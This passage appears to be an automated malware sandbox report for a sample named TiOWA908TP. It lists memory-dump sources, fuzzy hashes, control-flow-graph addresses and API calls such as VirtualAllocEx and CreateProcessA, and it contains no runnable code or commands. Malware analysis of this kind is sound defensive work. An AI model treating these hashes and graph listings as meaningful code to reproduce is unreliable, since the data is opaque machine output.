                                      • Opcode Fuzzy Hash: ae98a791e95a18c822a13c01fe1ecbfec28bf4629b192592dc58581d0061ed77
                                      • Instruction Fuzzy Hash: 9FC10670E05218CFEB94DF69D994BAEBBF2FB99300F1090AAD419A7385DB745981CF40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 418f28ca8ca459a0fb8de54db69c853ad79784a8ba1b408b1a464d05fe70a212
                                      • Instruction ID: f0c4c3ed3549bdae0bf4c35fb5531078999679d1791bbd8d265076c38154404d
                                      • Opcode Fuzzy Hash: 418f28ca8ca459a0fb8de54db69c853ad79784a8ba1b408b1a464d05fe70a212
                                      • Instruction Fuzzy Hash: 99812A70E052A8CFEB94DFA9D8887ADBBF2FB89300F109069D409A7355DB749985CF41

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 800 6551d08-6551d45 802 6551d67-6551d7d call 6551b10 800->802 803 6551d47-6551d4a 800->803 809 65520f3-6552107 802->809 810 6551d83-6551d8f 802->810 915 6551d4c call 6552610 803->915 916 6551d4c call 6552620 803->916 917 6551d4c call 6552678 803->917 918 6551d4c call 6552668 803->918 806 6551d52-6551d54 806->802 807 6551d56-6551d5e 806->807 807->802 818 6552147-6552150 809->818 811 6551d95-6551d98 810->811 812 6551ec0-6551ec7 810->812 814 6551d9b-6551da4 811->814 815 6551ff6-6552033 call 6551518 call 65544b0 812->815 816 6551ecd-6551ed6 812->816 819 65521e8 814->819 820 6551daa-6551dbe 814->820 860 6552039-65520ea call 6551518 815->860 816->815 821 6551edc-6551fe8 call 6551518 call 6551aa8 call 6551518 816->821 823 6552115-655211e 818->823 824 6552152-6552159 818->824 828 65521ed-65521f1 819->828 835 6551dc4-6551e59 call 6551b10 * 2 call 6551518 call 6551aa8 call 6551b50 call 6551bf8 call 6551c60 820->835 836 6551eb0-6551eba 820->836 911 6551ff3-6551ff4 821->911 912 6551fea 821->912 823->819 829 6552124-6552136 823->829 825 65521a7-65521ae 824->825 826 655215b-655219e call 6551518 824->826 837 65521b0-65521c0 825->837 838 65521d3-65521e6 825->838 826->825 833 65521f3 828->833 834 65521fc 828->834 845 6552146 829->845 846 6552138-655213d 829->846 833->834 844 65521fd 834->844 890 6551e78-6551eab call 6551c60 835->890 891 6551e5b-6551e73 call 6551bf8 call 6551518 call 65517c8 835->891 836->812 836->814 837->838 849 65521c2-65521ca 837->849 838->828 844->844 845->818 919 6552140 call 6554c50 846->919 920 6552140 call 6554c40 846->920 849->838 860->809 890->836 891->890 911->815 912->911 915->806 916->806 917->806 918->806 919->845 920->845
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q
                                      • API String ID: 0-3126650252
                                      • Opcode ID: cac3d3005de9eb8279b4841bbeda61a6b5fee8c978b25eac54d0c25a250bac74
                                      • Instruction ID: 869fbcc9f382ee8872876ae610a26f0eda5e5418f8e7a89fca6388e0d268674e
                                      • Opcode Fuzzy Hash: cac3d3005de9eb8279b4841bbeda61a6b5fee8c978b25eac54d0c25a250bac74
                                      • Instruction Fuzzy Hash: 69F1FD34A10118DFDB54DFA4D898A9DBBB2FF89300F118559E906AB3A1DB71ED46CF80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834768828.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_62a0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q
                                      • API String ID: 0-1467158625
                                      • Opcode ID: 5056160a4b5aa3a37b39b671dad02a0cb66aaf170853d6e0d34a46424d89fd35
                                      • Instruction ID: a68f3fa85b4e29617e7c02298ba8d82202c55e4c6b0c01a959d28549487f49ea
                                      • Opcode Fuzzy Hash: 5056160a4b5aa3a37b39b671dad02a0cb66aaf170853d6e0d34a46424d89fd35
                                      • Instruction Fuzzy Hash: 3242C174E2431ACFDB94DFA4D598AADB7B2FF48301F109019DA12AB294CBB45D42CF91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1446 63ed4a0-63ed4a5 1447 63ed4ad-63ed4b7 1446->1447 1449 63ed4dd-63ed4e0 1447->1449 1450 63ed4b9-63ed4d7 1447->1450 1451 63ed4e6-63ed4ec 1449->1451 1452 63ed665-63ed66c 1449->1452 1450->1449 1455 63ed6ae-63ed6c0 1450->1455 1451->1452 1454 63ed4f2-63ed4fb 1451->1454 1457 63ed4fd-63ed50c 1454->1457 1458 63ed533-63ed539 1454->1458 1466 63ed67f-63ed6a7 1455->1466 1467 63ed6c2-63ed6f9 1455->1467 1457->1458 1465 63ed50e-63ed527 1457->1465 1460 63ed53f-63ed548 1458->1460 1461 63ed644-63ed64a 1458->1461 1460->1461 1470 63ed54e-63ed55a 1460->1470 1461->1452 1463 63ed64c-63ed65c 1461->1463 1463->1452 1473 63ed65e-63ed663 1463->1473 1465->1458 1475 63ed529-63ed52c 1465->1475 1466->1455 1481 63ed6fb-63ed708 1467->1481 1482 63ed732-63ed734 1467->1482 1479 63ed5f8-63ed63c 1470->1479 1480 63ed560-63ed588 1470->1480 1473->1452 1475->1458 1479->1461 1480->1479 1493 63ed58a-63ed5c7 1480->1493 1481->1482 1489 63ed70a-63ed730 1481->1489 1483 63edb7f-63edb86 1482->1483 1489->1482 1499 63ed739-63ed76d 1489->1499 1493->1479 1505 63ed5c9-63ed5f6 1493->1505 1507 63ed773-63ed77c 1499->1507 1508 63ed810-63ed81f 1499->1508 1505->1461 1510 63edb87-63edb97 1507->1510 1511 63ed782-63ed795 1507->1511 1514 63ed85e 1508->1514 1515 63ed821-63ed837 1508->1515 1520 63ed7fe-63ed80a 1511->1520 1521 63ed797-63ed7b0 1511->1521 1519 63ed860-63ed865 1514->1519 1526 63ed839-63ed855 1515->1526 1527 63ed857-63ed85c 1515->1527 1523 63ed8a8-63ed8c4 1519->1523 1524 63ed867-63ed888 1519->1524 1520->1507 1520->1508 1521->1520 1536 63ed7b2-63ed7c0 1521->1536 1533 63ed98c-63ed995 1523->1533 1534 63ed8ca-63ed8d3 1523->1534 1524->1523 1540 63ed88a 1524->1540 1526->1519 1527->1519 1537 63edb7d 1533->1537 1538 63ed99b 1533->1538 1534->1510 1539 63ed8d9-63ed8f6 1534->1539 1536->1520 1548 63ed7c2-63ed7c6 1536->1548 1537->1483 1541 63ed9a9-63ed9b7 1538->1541 1542 63eda06-63eda14 1538->1542 1543 63ed9a2-63ed9a4 1538->1543 1561 63ed8fc-63ed912 1539->1561 1562 63ed97a-63ed986 1539->1562 1544 63ed88d-63ed8a6 1540->1544 1554 63ed9cf-63ed9d6 1541->1554 1555 63ed9b9-63ed9c1 1541->1555 1550 63eda2c-63eda43 1542->1550 1551 63eda16-63eda1e 1542->1551 1543->1483 1544->1523 1548->1510 1553 63ed7cc-63ed7e5 1548->1553 1566 63eda5b-63eda6e 1550->1566 1567 63eda45-63eda4d 1550->1567 1551->1550 1553->1520 1571 63ed7e7-63ed7fb 1553->1571 1554->1483 1555->1554 1561->1562 1572 63ed914-63ed922 1561->1572 1562->1533 1562->1534 1575 63eda86-63edaa3 1566->1575 1576 63eda70-63eda78 1566->1576 1567->1566 1571->1520 1572->1562 1580 63ed924-63ed928 1572->1580 1586 63edabb 1575->1586 1587 63edaa5-63edaad 1575->1587 1576->1575 1580->1510 1583 63ed92e-63ed957 1580->1583 1583->1562 1591 63ed959-63ed977 1583->1591 1586->1483 1587->1586 1591->1562
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Plq$$q
                                      • API String ID: 0-181920578
                                      • Opcode ID: 5e4ec0774c6bd6db38d09d7e70ed23cc5e641350dd5ceec9d9ac2a0e01642c90
                                      • Instruction ID: 93ecd692587452806b0b3d07977ce9b6ea4bef0ca300ba803de59f4094effc2f
                                      • Opcode Fuzzy Hash: 5e4ec0774c6bd6db38d09d7e70ed23cc5e641350dd5ceec9d9ac2a0e01642c90
                                      • Instruction Fuzzy Hash: E7124774B002148FDB54DF29C994A6AB7F6FF88704F1584A9E506DB3A1DB31EC46CBA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1595 62a4210-62a4238 1597 62a423a 1595->1597 1598 62a423f-62a4268 1595->1598 1597->1598 1599 62a426a-62a4273 1598->1599 1600 62a4289 1598->1600 1601 62a427a-62a427d 1599->1601 1602 62a4275-62a4278 1599->1602 1603 62a428c-62a4290 1600->1603 1604 62a4287 1601->1604 1602->1604 1605 62a4647-62a465e 1603->1605 1604->1603 1607 62a4664-62a4668 1605->1607 1608 62a4295-62a4299 1605->1608 1611 62a466a-62a469a 1607->1611 1612 62a469d-62a46a1 1607->1612 1609 62a429b-62a42f8 1608->1609 1610 62a429e-62a42a2 1608->1610 1622 62a42fa-62a436b 1609->1622 1623 62a42fd-62a4301 1609->1623 1614 62a42cb-62a42ef 1610->1614 1615 62a42a4-62a42c8 1610->1615 1611->1612 1616 62a46c2 1612->1616 1617 62a46a3-62a46ac 1612->1617 1614->1605 1615->1614 1620 62a46c5-62a46cb 1616->1620 1618 62a46ae-62a46b1 1617->1618 1619 62a46b3-62a46b6 1617->1619 1628 62a46c0 1618->1628 1619->1628 1630 62a436d-62a43ca 1622->1630 1631 62a4370-62a4374 1622->1631 1625 62a432a-62a433b 1623->1625 1626 62a4303-62a4327 1623->1626 1650 62a4344-62a4351 1625->1650 1626->1625 1628->1620 1640 62a43cf-62a43d3 1630->1640 1641 62a43cc-62a4428 1630->1641 1634 62a439d-62a43c1 1631->1634 1635 62a4376-62a439a 1631->1635 1634->1605 1635->1634 1644 62a43fc-62a441f 1640->1644 1645 62a43d5-62a43f9 1640->1645 1653 62a442a-62a448c 1641->1653 1654 62a442d-62a4431 1641->1654 1644->1605 1645->1644 1651 62a4353-62a4359 1650->1651 1652 62a4361-62a4362 1650->1652 1651->1652 1652->1605 1663 62a448e-62a44f0 1653->1663 1664 62a4491-62a4495 1653->1664 1656 62a445a-62a4472 1654->1656 1657 62a4433-62a4457 1654->1657 1673 62a4482-62a4483 1656->1673 1674 62a4474-62a447a 1656->1674 1657->1656 1675 62a44f2-62a4554 1663->1675 1676 62a44f5-62a44f9 1663->1676 1666 62a44be-62a44d6 1664->1666 1667 62a4497-62a44bb 1664->1667 1684 62a44d8-62a44de 1666->1684 1685 62a44e6-62a44e7 1666->1685 1667->1666 1673->1605 1674->1673 1686 62a4559-62a455d 1675->1686 1687 62a4556-62a45b8 1675->1687 1678 62a44fb-62a451f 1676->1678 1679 62a4522-62a453a 1676->1679 1678->1679 1695 62a454a-62a454b 1679->1695 1696 62a453c-62a4542 1679->1696 1684->1685 1685->1605 1689 62a455f-62a4583 1686->1689 1690 62a4586-62a459e 1686->1690 1697 62a45ba-62a4613 1687->1697 1698 62a45bd-62a45c1 1687->1698 1689->1690 1706 62a45ae-62a45af 1690->1706 1707 62a45a0-62a45a6 1690->1707 1695->1605 1696->1695 1708 62a463c-62a463f 1697->1708 1709 62a4615-62a4639 1697->1709 1700 62a45ea-62a460d 1698->1700 1701 62a45c3-62a45e7 1698->1701 1700->1605 1701->1700 1706->1605 1707->1706 1708->1605 1709->1708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834768828.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_62a0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q
                                      • API String ID: 0-1467158625
                                      • Opcode ID: 19450eb66f357418ab231b781372c09867d2ef8fe391838e43a3d964d6b4cc35
                                      • Instruction ID: f29abff4f58969b3a5a4056939f5f6fa05b801da7115fcccaa843a5ab000f229
                                      • Opcode Fuzzy Hash: 19450eb66f357418ab231b781372c09867d2ef8fe391838e43a3d964d6b4cc35
                                      • Instruction Fuzzy Hash: C1F1C330D25309DFCB54EFA4E5986ACBBF2FF89311F205529E906A7254CBB49985CF40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1721 25a952c 1722 25a953d-25a9546 1721->1722 1723 25a97f0-25a9809 1721->1723 1724 25a9548 1722->1724 1725 25a954f-25a9550 1722->1725 1734 25a9610-25a9629 1723->1734 1739 25a980f-25a9838 1723->1739 1724->1723 1726 25a9555-25a9598 1724->1726 1727 25a95db-25a95fa 1724->1727 1728 25a97a8-25a97ae 1724->1728 1729 25a97d9-25a97eb 1724->1729 1730 25a984e-25a9891 1724->1730 1731 25a98af-25a9910 1724->1731 1732 25a969c 1724->1732 1733 25a992c-25a9940 1724->1733 1724->1734 1735 25a9926-25a9927 1724->1735 1736 25a9896-25a98aa 1724->1736 1725->1723 1725->1726 1726->1723 1774 25a959e-25a95c5 1726->1774 1727->1729 1747 25a9600-25a960b 1727->1747 1744 25a97ba-25a97c7 1728->1744 1729->1722 1731->1722 1776 25a9916-25a9921 1731->1776 1746 25a96a8-25a9794 1732->1746 1738 25a9942-25a9963 1733->1738 1749 25a962b-25a9637 1734->1749 1750 25a9653 1734->1750 1735->1723 1736->1738 1755 25a9965-25a996e 1738->1755 1739->1722 1753 25a983e-25a9849 1739->1753 1744->1723 1751 25a97c9-25a97d4 1744->1751 1746->1722 1791 25a979a-25a97a3 1746->1791 1747->1722 1757 25a9639-25a963f 1749->1757 1758 25a9641-25a9647 1749->1758 1759 25a9659-25a9686 1750->1759 1751->1722 1753->1722 1762 25a9970 1755->1762 1763 25a9977-25a9978 1755->1763 1764 25a9651 1757->1764 1758->1764 1759->1722 1775 25a968c-25a9697 1759->1775 1766 25a997a-25a997b 1762->1766 1767 25a9993-25a99c8 1762->1767 1768 25a997d-25a9984 1762->1768 1769 25a99d7 1762->1769 1763->1766 1763->1767 1764->1759 1766->1769 1767->1755 1784 25a99ca-25a99d5 1767->1784 1768->1767 1773 25a9986-25a9991 1768->1773 1777 25a99d8 1769->1777 1773->1755 1774->1722 1783 25a95cb-25a95d6 1774->1783 1775->1722 1776->1722 1777->1777 1783->1722 1784->1755 1791->1722
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4815159663.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_25a0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHq$`Qq
                                      • API String ID: 0-577899614
                                      • Opcode ID: 2cf264591b3678d982c5a669c0b74857b1ac08924cdec056a8a4f609485acd13
                                      • Instruction ID: 650c5c8c0b4fe28eeb5b5d1df26bcdecd51874b56f482ee6d889a0fce312d52f
                                      • Opcode Fuzzy Hash: 2cf264591b3678d982c5a669c0b74857b1ac08924cdec056a8a4f609485acd13
                                      • Instruction Fuzzy Hash: 69B1E274D41269CFDB649F64D8A9BEDBBB1BF49300F1048DAD50AA2280CB746EC4DF19

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1792 25a9531-25a9537 1793 25a953d-25a9546 1792->1793 1794 25a9548 1793->1794 1795 25a954f-25a9550 1793->1795 1796 25a97f0-25a9809 1794->1796 1797 25a9555-25a9598 1794->1797 1798 25a95db-25a95fa 1794->1798 1799 25a97a8-25a97ae 1794->1799 1800 25a97d9-25a97eb 1794->1800 1801 25a984e-25a9891 1794->1801 1802 25a98af-25a9910 1794->1802 1803 25a969c 1794->1803 1804 25a992c-25a9940 1794->1804 1805 25a9610-25a9629 1794->1805 1806 25a9926-25a9927 1794->1806 1807 25a9896-25a98aa 1794->1807 1795->1796 1795->1797 1796->1805 1822 25a980f-25a9838 1796->1822 1797->1796 1845 25a959e-25a95c5 1797->1845 1798->1800 1817 25a9600-25a960b 1798->1817 1813 25a97ba-25a97c7 1799->1813 1800->1793 1802->1793 1847 25a9916-25a9921 1802->1847 1816 25a96a8-25a9794 1803->1816 1808 25a9942-25a9963 1804->1808 1819 25a962b-25a9637 1805->1819 1820 25a9653 1805->1820 1806->1796 1807->1808 1824 25a9965-25a996e 1808->1824 1813->1796 1821 25a97c9-25a97d4 1813->1821 1816->1793 1862 25a979a-25a97a3 1816->1862 1817->1793 1826 25a9639-25a963f 1819->1826 1827 25a9641-25a9647 1819->1827 1828 25a9659-25a9686 1820->1828 1821->1793 1822->1793 1835 25a983e-25a9849 1822->1835 1831 25a9970 1824->1831 1832 25a9977-25a9978 1824->1832 1833 25a9651 1826->1833 1827->1833 1828->1793 1846 25a968c-25a9697 1828->1846 1837 25a997a-25a997b 1831->1837 1838 25a9993-25a99c8 1831->1838 1839 25a997d-25a9984 1831->1839 1840 25a99d7 1831->1840 1832->1837 1832->1838 1833->1828 1835->1793 1837->1840 1838->1824 1855 25a99ca-25a99d5 1838->1855 1839->1838 1844 25a9986-25a9991 1839->1844 1848 25a99d8 1840->1848 1844->1824 1845->1793 1854 25a95cb-25a95d6 1845->1854 1846->1793 1847->1793 1848->1848 1854->1793 1855->1824 1862->1793
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4815159663.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_25a0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHq$`Qq
                                      • API String ID: 0-577899614
                                      • Opcode ID: 68aa2c9812017a2c64d9e0f26c4bbb1ca07287700d27bdcb84c97a2480886abb
                                      • Instruction ID: 999937ca1c4fb3a4904a5a158a300cbe53e437a729172114aafb5152a1a831e5
                                      • Opcode Fuzzy Hash: 68aa2c9812017a2c64d9e0f26c4bbb1ca07287700d27bdcb84c97a2480886abb
                                      • Instruction Fuzzy Hash: 32B1D3B4D41269CFDB649F64D869BEDBBB1BF48300F1048DAD50AA2280DB746EC4DF19

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1863 663d38b-663d3ac 1866 663d3b2-663d3d4 1863->1866 1867 663dfb8-663dff2 1863->1867 1868 663cf9a-663cfa3 1866->1868 1869 663d3da-663d3e5 1866->1869 1900 663dff5 call 5568230 1867->1900 1901 663dff5 call 5568238 1867->1901 1870 663cfa5 1868->1870 1871 663cfac-663df12 1868->1871 1869->1868 1870->1871 1873 663cf27-663cf34 1870->1873 1874 663cf0a-663cf1b 1870->1874 1875 663ceca-663cefd 1870->1875 1876 663cf39-663cf7f 1870->1876 1877 663cf1d-663cf24 1870->1877 1881 663df18-663df3a 1871->1881 1882 663daff-663db15 1871->1882 1885 663cea9-663ceac 1873->1885 1889 663ceb2-663cebb 1874->1889 1875->1889 1891 663ceff-663cf08 1875->1891 1876->1868 1895 663cf81-663cf8c 1876->1895 1881->1868 1888 663df40-663df4b 1881->1888 1882->1868 1885->1889 1888->1868 1893 663cec4-663e524 1889->1893 1894 663cebd 1889->1894 1891->1889 1892 663dff7-663e028 1892->1868 1897 663e02e-663e039 1892->1897 1898 663e536-663e53f 1893->1898 1899 663e526-663e531 1893->1899 1894->1894 1895->1868 1897->1868 1898->1885 1899->1889 1900->1892 1901->1892
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$/
                                      • API String ID: 0-2439032044
                                      • Opcode ID: 529760d213cd4067c887f7d6284596bc702fcfb956ae65db9e1476269c9a29bd
                                      • Instruction ID: 7be4749a85e385941ec92ff11d7242529ec62cbe45166a2ff9f4f64fe66c6e34
                                      • Opcode Fuzzy Hash: 529760d213cd4067c887f7d6284596bc702fcfb956ae65db9e1476269c9a29bd
                                      • Instruction Fuzzy Hash: 1F51F174D05268CFDBA0DF58D888BE9BBB1BB89300F0085EAE50AB7244D7755AC5CF50

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1902 663cfcc-663cfd0 1903 663d873-663d883 1902->1903 1904 663cfd6-663cfe0 1902->1904 1908 663d889 call 5566ed0 1903->1908 1909 663d889 call 5566ee0 1903->1909 1904->1903 1906 663d88f-663d8ad 1910 663d8b0 call 5567001 1906->1910 1911 663d8b0 call 5567008 1906->1911 1907 663d8b2-663d8c9 1908->1906 1909->1906 1910->1907 1911->1907
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ($E
                                      • API String ID: 0-1044486899
                                      • Opcode ID: f929cc4e22f0b9cbccad700ec123e72baa10b369327d258d710c97103ef921a9
                                      • Instruction ID: bd9695f92e0801fd541841c5dece53805640a61b2b305a520488b22e1a22da41
                                      • Opcode Fuzzy Hash: f929cc4e22f0b9cbccad700ec123e72baa10b369327d258d710c97103ef921a9
                                      • Instruction Fuzzy Hash: EBF0F474A09229CFEB50DF20C948BE9BBF5EF85304F1080D9D4496B291CB759E86CF41

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1912 5567734-5567a23 VirtualAllocEx 1916 5567a25-5567a2b 1912->1916 1917 5567a2c-5567a51 1912->1917 1916->1917
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05567A16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 9b59ad677bcdf8685b91dccdbd2c77bbfd9f5eb754e8089ff9c6465a13bb6121
                                      • Instruction ID: d325e394616f55c505acda214e9a383f512ddc32b33ad72cb748017a4db5fb83
                                      • Opcode Fuzzy Hash: 9b59ad677bcdf8685b91dccdbd2c77bbfd9f5eb754e8089ff9c6465a13bb6121
                                      • Instruction Fuzzy Hash: 3B2144768043889FDB10DFAAC844BDFBBF5EB88314F14881AD459A7280C679A944CBA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2014 63ecca0-63eccc3 2015 63eccc5-63eccd0 2014->2015 2016 63eccd2-63eccdb 2014->2016 2015->2016 2017 63eccde-63ecd12 call 63ed4a0 2015->2017 2020 63ecd14-63ecd2c 2017->2020 2021 63ecd63-63ecd8a 2017->2021 2020->2021 2024 63ecd2e-63ecd59 2020->2024 2025 63ecf7d-63ecf8f call 63ec7e8 2021->2025 2026 63ecd90 2021->2026 2024->2021 2035 63ecd5b-63ecd60 2024->2035 2033 63ecfae-63ecfb4 2025->2033 2034 63ecf91-63ecfa9 2025->2034 2028 63ecd99-63ecda1 2026->2028 2031 63ecdaa-63ecdad 2028->2031 2032 63ecda3 2028->2032 2049 63ecf2d-63ecf4f 2031->2049 2050 63ecdb3-63ecdb6 2031->2050 2032->2031 2036 63ece5f-63ece73 2032->2036 2037 63ecefa-63ecf0d 2032->2037 2038 63ece78-63ece8c 2032->2038 2039 63ece18-63ece2b 2032->2039 2040 63ecdd8-63ece13 2032->2040 2041 63ece30-63ece43 2032->2041 2042 63ece91-63ecea4 2032->2042 2043 63ecf0f-63ecf2b 2032->2043 2044 63ececa-63ecedc 2032->2044 2045 63ece48-63ece5a 2032->2045 2046 63ecea9-63ecec5 2032->2046 2047 63ecdc1-63ecdd3 2032->2047 2048 63ecee1-63ecef5 2032->2048 2051 63ecfb6-63ecfbd 2033->2051 2052 63ecfc3-63ed00d call 63edc90 2033->2052 2034->2033 2061 63ecfab 2034->2061 2035->2021 2036->2025 2037->2025 2038->2025 2039->2025 2040->2025 2041->2025 2042->2025 2043->2025 2044->2025 2045->2025 2046->2025 2047->2025 2048->2025 2049->2025 2055 63ecdbc 2050->2055 2056 63ecf51-63ecf7b 2050->2056 2051->2052 2054 63ecfbf-63ecfc1 2051->2054 2077 63ed013 2052->2077 2064 63ed015-63ed017 2054->2064 2055->2025 2056->2025 2061->2033 2075 63ed01d-63ed026 2064->2075 2076 63ed33b-63ed344 2064->2076 2078 63ed038-63ed078 2075->2078 2079 63ed028-63ed030 2075->2079 2077->2064 2087 63ed08c 2078->2087 2088 63ed07a-63ed08a 2078->2088 2079->2078 2089 63ed08e-63ed090 2087->2089 2088->2087 2088->2089 2091 63ed0af-63ed0de 2089->2091 2092 63ed092-63ed0ad 2089->2092 2097 63ed11b-63ed123 2091->2097 2101 63ed0e0-63ed10c 2091->2101 2092->2097 2099 63ed125-63ed12f 2097->2099 2100 63ed131 2097->2100 2102 63ed136-63ed138 2099->2102 2100->2102 2101->2097 2111 63ed10e-63ed112 2101->2111 2103 63ed13a-63ed140 2102->2103 2104 63ed148-63ed1ba 2102->2104 2103->2104 2112 63ed1de-63ed204 2104->2112 2113 63ed1bc-63ed1d3 2104->2113 2111->2097 2115 63ed21b 2112->2115 2116 63ed206-63ed213 call 63ee110 2112->2116 2113->2112 2117 63ed21d-63ed23c 2115->2117 2118 63ed219 2116->2118 2117->2076 2120 63ed242-63ed254 call 63ec7e8 2117->2120 2118->2117 2120->2076 2123 63ed25a-63ed272 2120->2123 2125 63ed2ab-63ed2c3 2123->2125 2126 63ed274-63ed27d 2123->2126 2131 63ed2c5-63ed2ce 2125->2131 2132 63ed2f3-63ed30b 2125->2132 2127 63ed27f-63ed282 2126->2127 2128 63ed28c-63ed293 2126->2128 2127->2128 2128->2125 2130 63ed295-63ed2a6 2128->2130 2130->2076 2134 63ed2dd-63ed2e6 2131->2134 2135 63ed2d0-63ed2d3 2131->2135 2132->2076 2138 63ed30d-63ed316 2132->2138 2134->2132 2136 63ed2e8-63ed2f0 2134->2136 2135->2134 2136->2132 2140 63ed318-63ed31b 2138->2140 2141 63ed325-63ed32e 2138->2141 2140->2141 2141->2076 2142 63ed330-63ed338 2141->2142 2142->2076
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (_q
                                      • API String ID: 0-3590916094
                                      • Opcode ID: 0abc704429da023e593ec5148c52bc1d5b701b47bc105f252fbf0ab950f5df71
                                      • Instruction ID: e9d7b303f11c219033ded90063e747406d6cc5e6f1a34def5d3f4efc249c68aa
                                      • Opcode Fuzzy Hash: 0abc704429da023e593ec5148c52bc1d5b701b47bc105f252fbf0ab950f5df71
                                      • Instruction Fuzzy Hash: EC229D35A102149FDB54CFA8D894AADB7F6FF88300F148069E915EB3A5CB75EC45CBA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2147 5565185-5565200 2150 5565202-556520c 2147->2150 2151 5565239-5565259 2147->2151 2150->2151 2152 556520e-5565210 2150->2152 2158 5565292-55652cc 2151->2158 2159 556525b-5565265 2151->2159 2153 5565212-556521c 2152->2153 2154 5565233-5565236 2152->2154 2156 5565220-556522f 2153->2156 2157 556521e 2153->2157 2154->2151 2156->2156 2160 5565231 2156->2160 2157->2156 2165 5565305-556537a CreateProcessA 2158->2165 2166 55652ce-55652d8 2158->2166 2159->2158 2161 5565267-5565269 2159->2161 2160->2154 2163 556528c-556528f 2161->2163 2164 556526b-5565275 2161->2164 2163->2158 2167 5565277 2164->2167 2168 5565279-5565288 2164->2168 2178 5565383-55653cb 2165->2178 2179 556537c-5565382 2165->2179 2166->2165 2170 55652da-55652dc 2166->2170 2167->2168 2168->2168 2169 556528a 2168->2169 2169->2163 2171 55652de-55652e8 2170->2171 2172 55652ff-5565302 2170->2172 2174 55652ec-55652fb 2171->2174 2175 55652ea 2171->2175 2172->2165 2174->2174 2177 55652fd 2174->2177 2175->2174 2177->2172 2184 55653cd-55653d1 2178->2184 2185 55653db-55653df 2178->2185 2179->2178 2184->2185 2186 55653d3 2184->2186 2187 55653e1-55653e5 2185->2187 2188 55653ef-55653f3 2185->2188 2186->2185 2187->2188 2191 55653e7 2187->2191 2189 55653f5-55653f9 2188->2189 2190 5565403 2188->2190 2189->2190 2192 55653fb 2189->2192 2193 5565404 2190->2193 2191->2188 2192->2190 2193->2193
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0556536A
                                      Memory Dump Source
